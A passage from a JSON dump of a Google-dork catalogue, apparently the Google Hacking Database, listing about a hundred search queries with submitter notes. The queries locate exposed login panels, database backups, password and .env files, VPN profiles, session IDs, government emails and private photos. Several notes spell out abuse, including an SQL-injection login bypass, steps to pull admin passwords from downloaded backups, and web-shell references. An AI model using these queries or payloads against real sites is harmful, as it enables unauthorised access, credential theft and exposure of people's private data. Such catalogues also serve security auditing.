Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove ]", "id": 3927}, {"short description": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "long description": "Find IDS and Mod securitydork: intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "submited": "2014-02-05", "request": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "id": 3928}, {"short description": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "long description": "zimbra webmail login page lookupallinurl:\"zimbra/?zinitmode=http\" -google -github-------------------------------------------------------------------*|JJohnny *RANDRIAMAMPIONONA || Phone: (+261) 33 08 003 61 || NSS Engineer | IS Security Enthusiast || |----------------------------------------------------------------|", "submited": "2014-02-05", "request": "allinurl:\"zimbra/?zinitmode=http\" -google -github", "id": 3929}, {"short description": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "long description": "Here is a Dork I use in conjunction with sqlmap, for shopping carts withMySQLError messages.It got 80.000 results.intext:\"Access denied for\" intitle:\"Shopping cart\"", "submited": "2014-02-05", "request": "intext:\"Access denied for\" intitle:\"Shopping cart\"", "id": 3930}, {"short description": "allinurl:/hide_my_wp=", "long description": "i just found a google dork that isfile/path disclosure ofHide My WP pluginGoogle dork - allinurl:/hide_my_wp=it will show the plugin file folder and all file.thankskamrul hassan arman", "submited": "2014-02-05", "request": "allinurl:/hide_my_wp=", "id": 3931}, {"short description": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "long description": "Search Oracle Reports likely vulnerable to DB user/password disclosure(CVE-2012-3152and CVE-2012-3153)--Felipe Molina", "submited": "2014-02-05", "request": "inurl:\"/reports/rwservlet\" intext:\"Oracle\"", "id": 3932}, 
{"short description": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "long description": "The web application is vulnerable to Directory Traversal and XSS.The version number can be omitted, all prior versions prior than 2.1.4are vulnerable.Advisories and Vulnerabilitieshttp://www.exploit-db.com/exploits/31173/http://www.pchart.net/advisory", "submited": "2014-02-05", "request": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "id": 3933}, {"short description": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "long description": "Just another error that reveals full paths", "submited": "2014-02-05", "request": "\"[function.getimagesize]: failed to open stream: No such file or directory in\"", "id": 3934}, {"short description": "site:bitbucket.org inurl:.bash_history", "long description": "Finding Sensitive datasite:bitbucket.org inurl:.bash_historyBy Pharos", "submited": "2014-02-05", "request": "site:bitbucket.org inurl:.bash_history", "id": 3935}, {"short description": "intitle:Admin inurl:login.php site:.co.in", "long description": "dork submitted by M4RKM3N aka Osama Mahmoodrevels admin login panels of sites :)", "submited": "2014-02-28", "request": "intitle:Admin inurl:login.php site:.co.in", "id": 3936}, {"short description": "inurl:crossdomain filetype:xml intext:allow-access-from", "long description": "Locates crossdomain.xml files used by flash/flex/silverlight todetermine the cross domain policy of that site'sflash/flex/silverlight apps. 
An open setting of will allow a weaponized flash application hosted on anattacker's site to read information from the target site while runningin a victim's browser.--Google+ http://google.com/+EricGragsoneRed Team http://www.crimsonagents.com/Blue Team http://www.erisresearch.org/Coding http://maetrics.github.io", "submited": "2014-03-27", "request": "inurl:crossdomain filetype:xml intext:allow-access-from", "id": 3937}, {"short description": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "long description": "Locates clientaccesspolicy.xml files used by silverlight to determinethe cross domain policy of that site's silverlight apps. An opensetting of will allow a weaponized silverlightapplication hosted on an attacker's site to read information from thetarget site while running in a victim's browser.--Google+ http://google.com/+EricGragsoneRed Team http://www.crimsonagents.com/Blue Team http://www.erisresearch.org/Coding http://maetrics.github.io", "submited": "2014-03-27", "request": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "id": 3938}, {"short description": "inurl:/backup intitle:index of backup intext:*sql", "long description": "Google Search:https://www.google.com/search?client=opera&q=admin+username+and+pass&sourceid=opera&ie=UTF-8&oe=UTF-8#q=inurl:/backup+intitle:index+of+backup+intext:*sql&start=701)Find the Back Up2)Downlod it3)Import it into phpmyadmin4)Find the admin username and password :)Dork submitted by The Vi9erGood Luck", "submited": "2014-03-31", "request": "inurl:/backup intitle:index of backup intext:*sql", "id": 3939}, {"short description": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "long description": "Finds login portals for Citrix XenApp.- Andy G - twitter.com/vxhex", "submited": "2014-03-31", "request": "inurl:\"Citrix/XenApp/auth/login.aspx\"", "id": 3940}, {"short description": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "long description": "Finds reports generated by Acunetix scans.- Andy 
G - twitter.com/vxhex", "submited": "2014-03-31", "request": "filetype:pdf \"acunetix website audit\" \"alerts summary\"", "id": 3941}, {"short description": "inurl:typo3/install/index.php?mode=", "long description": "typo3 install loginsBruno Schmid", "submited": "2014-04-07", "request": "inurl:typo3/install/index.php?mode=", "id": 3942}, {"short description": "inurl:typo3conf/localconf.php", "long description": "typo3 passwords :-)Bruno Schmid", "submited": "2014-04-07", "request": "inurl:typo3conf/localconf.php", "id": 3943}, {"short description": "intitle:\"Zimbra Web Client Sign In\"", "long description": "Open Source Zimbra Webmail Login pages", "submited": "2014-04-21", "request": "intitle:\"Zimbra Web Client Sign In\"", "id": 3944}, {"short description": "intitle:\"Zimbra Web Client Log In\"", "long description": "Open Source Zimbra Webmail Login pages", "submited": "2014-04-21", "request": "intitle:\"Zimbra Web Client Log In\"", "id": 3945}, {"short description": "xamppdirpasswd.txt filetype:txt", "long description": "xamppdirpasswd.txt filetype:txt", "submited": "2014-04-28", "request": "xamppdirpasswd.txt filetype:txt", "id": 3946}, {"short description": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "long description": "Search the CACTI system of SNMP graphsDaniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2014-04-30", "request": "inurl:\"/cacti/graph_view.php\" OR inurl:\"/cacti/graph.php?\"", "id": 3947}, {"short description": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "long description": "Search for all Apache servers that are running specific versions ofOpenSSL. 
These specific versions of OpenSSL could potentially be vulnerableto the heartbleed attack.Ahmad Al-Nounouhttp://www.linkedin.com/in/ahmadalnounou", "submited": "2014-05-05", "request": "\"OpenSSL\" AND \"1.0.1 Server at\" OR \"1.0.1a Server at\" OR \"1.0.1b Server at\" OR \"1.0.1c Server at\" OR \"1.0.1d Server at\" OR \"1.0.1e Server at\" OR \"1.0.1f Server at\"", "id": 3948}, {"short description": "inurl:\"/public.php?service=files\"", "long description": "Search for shared files from ownCloudDaniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2014-05-06", "request": "inurl:\"/public.php?service=files\"", "id": 3949}, {"short description": "intext:\"Hikvision\" inurl:\"login.asp\"", "long description": "Hikvision IP Camera login page", "submited": "2014-05-08", "request": "intext:\"Hikvision\" inurl:\"login.asp\"", "id": 3950}, {"short description": "inurl:dfshealth.jsp", "long description": "dork:inurl:dfshealth.jspdirect get the access of hadoop cluster with root user--Simmant Yadav", "submited": "2014-05-19", "request": "inurl:dfshealth.jsp", "id": 3951}, {"short description": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "long description": "Files with information DMZ, public IP, private IP network segments, etc.Daniel Maldonadohttp://caceriadespammers.com.ar", "submited": "2014-06-03", "request": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "id": 3952}, {"short description": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "long description": "Search the Munin monitoring graphsDaniel Maldonadohttp://caceriadespammers.blogspot.com.ar", "submited": "2014-06-12", "request": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", 
"id": 3953}, {"short description": "SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "long description": "inurl:/SiteScope/cgi/go.exe/SiteScope?page=twitter@firebitsbr", "submited": "2014-07-03", "request": "dorks:SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "id": 3954}, {"short description": "filetype:sql site:gov and \"insert into\"", "long description": "filetype:sql site:gov and \"insert into\"find sql files with data on governments sites", "submited": "2014-07-04", "request": "filetype:sql site:gov and \"insert into\"", "id": 3955}, {"short description": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "long description": "Hits: 4,250 resultsThis dork finds PacketCable 1.0 Touchstone Telephony Modems that are onlinewherein you see its event logs, system information, interface parameters,mac addresses, etc.*Jay Turla a.k.a shipcode*", "submited": "2014-07-21", "request": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "id": 3956}, {"short description": "http://www.google.com/search?q=filetype:sql site:com and \"insert into\" admin \"2014\"", "long description": "filetype:sql site:com and \"insert into\" admin \"2014\"http://facebook.com/groups/hfrosario", "submited": "2014-07-29", "request": "filetype:sql site:com and \"insert into\" admin \"2014\"", "id": 3957}, {"short description": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "long description": "via Priyal Viroja", "submited": "2014-08-09", "request": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "id": 3958}, {"short description": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "long description": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:iniFiles containing passwordsBy Dr4GoR1Ty", "submited": "2014-08-21", "request": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "id": 3959}, {"short description": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "long description": "ATM Passwords\"automatic teller\" \"operator manual\" 
\"password\" filetype:pdf", "submited": "2014-09-15", "request": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "id": 3960}, {"short description": "\"google confidential\" filetype:pdf", "long description": "\"google confidential\" filetype:pdfGoogle leaking their own files", "submited": "2014-09-15", "request": "\"google confidential\" filetype:pdf", "id": 3961}, {"short description": "intitle:\"virtual office\" sonicwall domain", "long description": "Network or vulnerability dataIP address AD Domain NameLogin entry/method for internal network", "submited": "2014-10-02", "request": "intitle:\"virtual office\" sonicwall domain", "id": 3962}, {"short description": "dcid= bn= pin code=", "long description": "Information disclosure of reservation information,which can leak to many other leaks.All related to t Booking.com client who decided to save theirs trip data online,sometime near personal information like passportBy popshark1", "submited": "2014-10-02", "request": "dcid= bn= pin code=", "id": 3963}, {"short description": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "long description": "gnu-bash site dorksAriel Anonis - @ariel_anonis", "submited": "2014-10-02", "request": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "id": 3964}, {"short description": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "long description": "Search for samAccountName (an ActiveDirectory attribute). 50/50 success, some usernames disclosed along with other information.", "submited": "2014-10-09", "request": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "id": 3965}, {"short description": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "long description": "Looks for text files with SHA1 of \"password\". 
These could be tips (not very useful), config files, other peoples wordlist dumps, etc", "submited": "2014-10-09", "request": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "id": 3966}, {"short description": "intitle:FRITZ!Box inurl:login.lua", "long description": "Show open FritzBox-Router withintitle:FRITZ!Box inurl:login.lua", "submited": "2014-10-09", "request": "intitle:FRITZ!Box inurl:login.lua", "id": 3967}, {"short description": "inurl:logon.html \"CSCOE\"", "long description": "Pages containing login portals - Web Server DetectionFinds logins portals for Cisco ASA Clientless Webvpninurl:logon.html \"CSCOE\"", "submited": "2014-10-14", "request": "inurl:logon.html \"CSCOE\"", "id": 3968}, {"short description": "inurl:cgi-bin/mailgraph.cgi", "long description": "Mail statisticsAriel Anonis - @ariel_anonis", "submited": "2014-10-15", "request": "inurl:cgi-bin/mailgraph.cgi", "id": 3969}, {"short description": "filetype:log intext:org.apache.hadoop.hdfs", "long description": "Dork : filetype:log intext:org.apache.hadoop.hdfsList of Log files which contain details about internal and External ip inHadoop Grid.This Log Files generated after every batch process.--Simmant Yadav", "submited": "2014-10-21", "request": "filetype:log intext:org.apache.hadoop.hdfs", "id": 3970}, {"short description": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "long description": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.orglook for a CHANGELOG.txt file that has drupal and SA-CORE in the text, but not the latest 7.32 patch. 
Ignore github and drupal.org", "submited": "2014-11-03", "request": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "id": 3971}, {"short description": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "long description": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.comsites that have robots.txt file (potentially blocking a GD for seeing) CHANGELOG.txtCan then check the CHANGELOG.txt file manually for version (not 7.32?).", "submited": "2014-11-03", "request": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "id": 3972}, {"short description": "ext:msg OR ext:eml site:gov OR site:edu", "long description": "Mails leak by Rootkit.", "submited": "2014-11-17", "request": "ext:msg OR ext:eml site:gov OR site:edu", "id": 3973}, {"short description": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "long description": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"Dork to find gov't emails.~ Carl", "submited": "2014-11-18", "request": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "id": 3974}, {"short description": "intext:\"Please Authenticate\" intitle:Peakflow", "long description": "Pages containing login portals - Web Server DetectionFinds Login portals for Arbor Peakflow (Anti-DDoS System)Twitter - @libborius", "submited": "2014-11-19", "request": "intext:\"Please Authenticate\" intitle:Peakflow", "id": 3975}, {"short description": "ext:log telnet intext:password", "long description": "Telnet logs.By Rootkit.", "submited": "2014-11-24", "request": "ext:log telnet intext:password", "id": 3976}, {"short description": "filetype:mobileconfig intext:password OR intext:pass", "long description": "filetype:mobileconfig intext:password OR intext:pass", "submited": 
"2014-11-24", "request": "filetype:mobileconfig intext:password OR intext:pass", "id": 3977}, {"short description": "inurl:yahoo_site_admin/credentials/", "long description": "# Exploit Title: [Yahoo Hosting db-credentials]# Google Dork: [inurl:yahoo_site_admin/credentials/]# Date: [29/11/2014]# Exploit Author: [Mohammad Shahein]# Vendor Homepage: [www.boxeffect.com ]# Tested on: Win7 ,Google Chrome Version 39.0.2171.71 m]Google the dork it will allow you to download db.conf the file will containthe following infomysql[ database name ][ database user name ][ database password ]*Mohammad Shaheen*senior Programer, BoxEffectwebsite: www.boxeffect.com", "submited": "2014-12-03", "request": "inurl:yahoo_site_admin/credentials/", "id": 3978}, {"short description": "ext:pem intext:BEGIN CERTIFICATE", "long description": "Vulnerables CA files.By Rootkit.", "submited": "2014-12-11", "request": "ext:pem intext:BEGIN CERTIFICATE", "id": 3979}, {"short description": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "long description": "Upload Vulnerability Elfinder 2.0inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "submited": "2014-12-22", "request": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "id": 3980}, {"short description": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "long description": "Files found with this google dork will show juicy information about amigration of a complete wordpress site, including the location of a .zipfile where the complete site is stored including \"wp-config.php\",\".htaccess\" and other interesting private files.This file is the result of a migration with the Wordpress plugin\"Duplicator\".Author: @felmoltor", "submited": "2014-12-31", "request": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "id": 3981}, {"short description": "inurl:dyn_sensors.htm", "long description": "MiniGoose II environmental temprature monitoring panelAuthor:@cns0x", "submited": "2015-01-06", 
"request": "inurl:dyn_sensors.htm", "id": 3982}, {"short description": "inurl:/cgi-bin/.cgi", "long description": "Finds open index of /cgi-bin.", "submited": "2015-01-06", "request": "inurl:/cgi-bin/.cgi", "id": 3983}, {"short description": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "long description": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabledSearches for fckeditor default url and which has a config.asp file where configisenabled = true. Unable to search for true value directly because file contains 'example' which could lead to false positive. If found, traversing two directories up to /connectors/ should present an uploadtest.html file.This may be old, though the existing DORKS didn't call it out specifically, and google still gives a lot of hits.", "submited": "2015-01-12", "request": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "id": 3984}, {"short description": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "long description": "Search Apache server information though default module info_module:inurl:\"/server-info\" intext:\"Loaded Modules\"Author: @felmoltor--Felipe Molina de la Torre", "submited": "2015-01-27", "request": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "id": 3985}, {"short description": "inurl:\"security/xamppdirpasswd.txt\"", "long description": "This dork shows the plain text password saved in a XAMPP installation whenthe administrator configures \"Security Console MySQL & XAMPP directoryprotection\":inurl:\"security/xamppdirpasswd.txt\"Author: @felmoltor--Felipe Molina de la Torre", "submited": "2015-02-09", "request": "inurl:\"security/xamppdirpasswd.txt\"", "id": 3986}, {"short description": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "long description": "Hi,This google dork to find sensitive and interesting information underWEB-INF directory via ftp protocol, for example:* Website map* Sensitive information (user name 
and password for webdave)* Deployment descriptor in java (web.xml)* Servlet mapping url patternKeyword:filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www--Fahad Altamimi", "submited": "2015-02-09", "request": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "id": 3987}, {"short description": "\".git\" intitle:\"Index of\"", "long description": "Shows publicly browsable .git directories", "submited": "2015-02-09", "request": "\".git\" intitle:\"Index of\"", "id": 3988}, {"short description": "inurl:.cgi-bin/webproc", "long description": "inurl:.cgi-bin/webprocLogin for various type of router.By Rootkit.", "submited": "2015-02-11", "request": "inurl:.cgi-bin/webproc", "id": 3989}, {"short description": "inurl:.cgi-bin/luci", "long description": "Directory \" Powered by LuCI Trunk\".By Rootkit.", "submited": "2015-02-11", "request": "inurl:.cgi-bin/luci", "id": 3990}, {"short description": "\"jos_users\" intitle:\"Index of\"", "long description": "\"jos_users\" intitle:\"Index of\"Files of configuration of user Joomla servers.By Rootkit.", "submited": "2015-02-11", "request": "\"jos_users\" intitle:\"Index of\"", "id": 3991}, {"short description": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "long description": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"Share-Link", "submited": "2015-02-17", "request": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "id": 3992}, {"short description": "\"Config\" intitle:\"Index of\" intext:vpn", "long description": "Directory with keys of vpn servers.By Rootkit.", "submited": "2015-02-19", "request": "\"Config\" intitle:\"Index of\" intext:vpn", "id": 3993}, {"short description": "inurl:/wp-content/wpbackitup_backups", "long description": "Relates to https://wordpress.org/plugins/wp-backitup/Sensitive data/site rips/db rips in public accessible foldersMr T3st3r", "submited": "2015-02-27", "request": "inurl:/wp-content/wpbackitup_backups", "id": 3994}, {"short 
description": "allinurl:moadmin.php -google -github", "long description": "The dork \"allinurl:moadmin.php -google -github\" show all the sites thatuses Mongo DBand the moadmin module to amministrate it.Some versions of this module allow non autenticated user to executearbitrary Unix commands sending a special POST request documented here:http://www.exploit-db.com/exploits/36251/PsyDel", "submited": "2015-03-04", "request": "allinurl:moadmin.php -google -github", "id": 3995}, {"short description": "ext:sql intext:\"alter user\" intext:\"identified by\"", "long description": "This dork will show files containing SQL instructions where theadministrator set a password for a database user.Author: @felmoltor", "submited": "2015-03-10", "request": "ext:sql intext:\"alter user\" intext:\"identified by\"", "id": 3996}, {"short description": "allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "long description": "The dork \"allintext:Copyright Smart PHP Poll. All Rights Reserved.-exploit\" show all the sites that uses Smart Pool php module.The login page can be bypassed using these credentialsUser: admin 'or' 1=1Password: anythingMore info here: http://www.exploit-db.com/exploits/36386/PsyDel", "submited": "2015-03-16", "request": "allintext:Copyright Smart PHP Poll. All Rights Reserved. 
-exploit", "id": 3997}, {"short description": "intitle:index of /weekly cpbackup", "long description": "useful for finding cpanel backups--Regards,H.R.", "submited": "2015-03-31", "request": "intitle:index of /weekly cpbackup", "id": 3998}, {"short description": "intitle:index.of +\"Indexed by Apache::Gallery\"", "long description": "Google dork for finding Private pics ;) :D#13lacKDemOn", "submited": "2015-04-03", "request": "intitle:index.of +\"Indexed by Apache::Gallery\"", "id": 3999}, {"short description": "intitle:index.of.accounts", "long description": "Dork for directory with accounts.By Rootkit.", "submited": "2015-04-03", "request": "intitle:index.of.accounts", "id": 4000}, {"short description": "intitle:index.of.dropbox", "long description": "Sensitive DirectoriesAriel Anonis - @ariel_anonis", "submited": "2015-04-23", "request": "intitle:index.of.dropbox", "id": 4001}, {"short description": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "long description": "Google dork to find session IDs and potentially impersonate users:intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:logRegards,Gabor Szathmari", "submited": "2015-04-28", "request": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "id": 4002}, {"short description": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "long description": "## Open Seagate NAS drivesinurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:DriveJason Coleman - CISSP, GWAPTAnalyst, Security Management Program | Verizon Enterprise Solutions", "submited": "2015-04-30", "request": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "id": 4003}, {"short description": "inurl:upsstats.cgi?host", "long description": "UPS Online Devices. 
Enjoy!!!.By Rootkit.", "submited": "2015-05-18", "request": "inurl:upsstats.cgi?host", "id": 4004}, {"short description": "ext:csv intext:\"password\"", "long description": "This dork finds csv files containing passwords and other juicy information.Author:NickiK.", "submited": "2015-05-19", "request": "ext:csv intext:\"password\"", "id": 4005}, {"short description": "filetype:pub inurl:ssh", "long description": "This dork finds various SSH pub files.Author:NickiK.", "submited": "2015-05-26", "request": "filetype:pub inurl:ssh", "id": 4006}, {"short description": "intitle:\"Index of ftp\"", "long description": "This dork finds open ftps. This is a base dork, where you can addintext:\"ssh/\" for folder search and intext:\"-2015\" for dates and years.Author:NickiK.", "submited": "2015-05-26", "request": "intitle:\"Index of ftp\"", "id": 4007}, {"short description": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "long description": "This dork finds vulnerabel revslider plugins.In reference to the exploit submitted by Adrian M. F.https://www.exploit-db.com/exploits/37067/Author:NickiK.", "submited": "2015-05-26", "request": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "id": 4008}, {"short description": "inurl:wp-admin/ intext:css/", "long description": "The dork finds misconfigured WordPress sites.Author:NickiK.", "submited": "2015-05-27", "request": "inurl:wp-admin/ intext:css/", "id": 4009}, {"short description": "inurl:/wp-admin/post.php?post=", "long description": "This dork finds websites which could be exploitable using Adrian M. 
F.landing page exploit - https://www.exploit-db.com/exploits/37108/Author:NickiK.", "submited": "2015-05-27", "request": "inurl:/wp-admin/post.php?post=", "id": 4010}, {"short description": "inurl:/graphs/ intitle:RouterOs", "long description": "files containing juicy infoAriel Anonis - @ariel_anonis", "submited": "2015-05-27", "request": "inurl:/graphs/ intitle:RouterOs", "id": 4011}, {"short description": "intext:DB_PASSWORD ext:env", "long description": "This dork finds env files, usually used in Laravel configuration,containing passwords and other juicy information.Author: Augusto Pereira", "submited": "2015-05-29", "request": "intext:DB_PASSWORD ext:env", "id": 4012}, {"short description": "intitle:\"index of\" \"archive.pst\" -contrib", "long description": "Google Dork: intitle:\"index of\" \"archive.pst\" -contribAuthor: SphearisThis dork allows you to see Outlook archive files stored in the open. Thesefiles can be opened with a simple .pst viewer to read all emails itcontains.The \"-contrib\" has been added to filter Cran installations which uses adirectory structure similar to the search terms.", "submited": "2015-05-29", "request": "intitle:\"index of\" \"archive.pst\" -contrib", "id": 4013}, {"short description": "inurl:/dbg-wizard.php", "long description": "# Exploit Title: Nusphere PHP DBG wizard# Date: 02-06-2015# Vendor Homepage: http://www.nusphere.com# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm# Version: any# Exploit Author: Alfred Armstrong# Contact: http://twitter.com/alfaguru# Website: http://figure-w.co.ukDBG Wizard is meant to be used with the DBG PHP debugger as an aid toconfiguring it correctly. 
It is supplied as a PHP script calleddbg-wizard.php which when placed in the root folder of a web site andexecuted provides instructions to the user about setting up their webserver so the debugger can be used.It is not meant to be present on a live site as it exposes detailsabout software configurations and versions which might allow anattacker to discover other vulnerabilities. If the DBG shared libraryis also installed it will expose that fact and potentially assist anattacker in crafting a request to start a debug session in which theycould do anything that can be done through a PHP script, includingreading files and accessing database entries.--Alfred Armstrong", "submited": "2015-06-03", "request": "inurl:/dbg-wizard.php", "id": 4014}, {"short description": "intitle:\"index of\" \"onetoc2\" \"one\"", "long description": "# Exploit Title: intitle:\"index of\" \"onetoc2\" \"one\"# Google Dork: intitle:\"index of\" \"onetoc2\" \"one\"# Date: 04/06/2015# Exploit Author: Sphearis# Vendor Homepage: NA# Software Link: NA# Version: NA# Tested on: ALL# CVE : NAThis dork allows you to see Onenote files stored in the open(*.one). Thesefiles can be read easily with Onenote or a compatible viewer, no password,no encryption.The onetoc2 is added, it's a worthless file but is always inside a foldercontaining one or several onenote files(and it obviously helps narrowingthe search to what we're looking for).", "submited": "2015-06-04", "request": "intitle:\"index of\" \"onetoc2\" \"one\"", "id": 4015}, {"short description": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "long description": "This Dork reveal the folders of \"Inbox\" and \"Sent\" for mail servers. 
Enjoy.", "submited": "2015-06-10", "request": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "id": 4016}, {"short description": "inurl:private_files", "long description": "Directory private files xD.By Rootkit.", "submited": "2015-06-10", "request": "inurl:private_files", "id": 4017}, {"short description": "filetype:pcf vpn OR Group", "long description": "Google Dork: filetype:pcf vpn OR GroupAuthor: azupwnThis dork allows you to search for publicly accessible profileconfiguration files (.pcf) used by VPN clients. These files typicallycontain usernames, password, tunneling ports, VPN server information andother information.Cheers,--azupwn", "submited": "2015-06-10", "request": "filetype:pcf vpn OR Group", "id": 4018}, {"short description": "intitle:\"index of\" \"fic\" \"ndx\"", "long description": "# Exploit Title: intitle:\"index of\" \"fic\" \"ndx\"# Google Dork: intitle:\"index of\" \"fic\" \"ndx\"# Date: 10/06/2015# Exploit Author: SphearisThis dork allows you to look for Hyperfile databases(.FIC) stored in theopen. You can simply read them in a text editor(You'll see the header andthen the database content in plain text) or you can convert them(to xml,excel, ...) with free software. 
In order to convert them, you also need thelinked index file (.NDX) and optional mmo file which are located in thesame directory.Some Windev/Webdev installations store usernames and other sensitiveinformation in that kind of file.", "submited": "2015-06-10", "request": "intitle:\"index of\" \"fic\" \"ndx\"", "id": 4019}, {"short description": "intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "long description": "From: Creep Mode Baby", "submited": "2015-06-17", "request": "intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "id": 4020}, {"short description": "intitle:\"index of\" inurl:\"no-ip.com\"", "long description": "# Exploit Title: intitle:\"index of\" inurl:\"no-ip.com\"# Google Dork: intitle:\"index of\" inurl:\"no-ip.com\"# Date: 17/06/2015# Exploit Author: Sphearis# Vendor Homepage: NA# Software Link: NA# Version: NA# Tested on: ALL# CVE : NAThis dork allows you to browse files stored on a personal server(home)using a dynamic dns service to update server IP.You can replace \"no-ip.com\" with any other dynamic dns hosts:\"dyndns.org\"\"ddns.net\"\"dynamic-dns.net\"\"dynip.com\"\"tzo.com\"And so on...", "submited": "2015-06-17", "request": "intitle:\"index of\" inurl:\"no-ip.com\"", "id": 4021}, {"short description": "Auth inurl:welcome ext:cgi", "long description": "A lot of Pages with logins portals.Enjoy.By Rootkit.", "submited": "2015-06-23", "request": "Auth inurl:welcome ext:cgi", "id": 4022}, {"short description": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "long description": "A new WebShell interesting. 
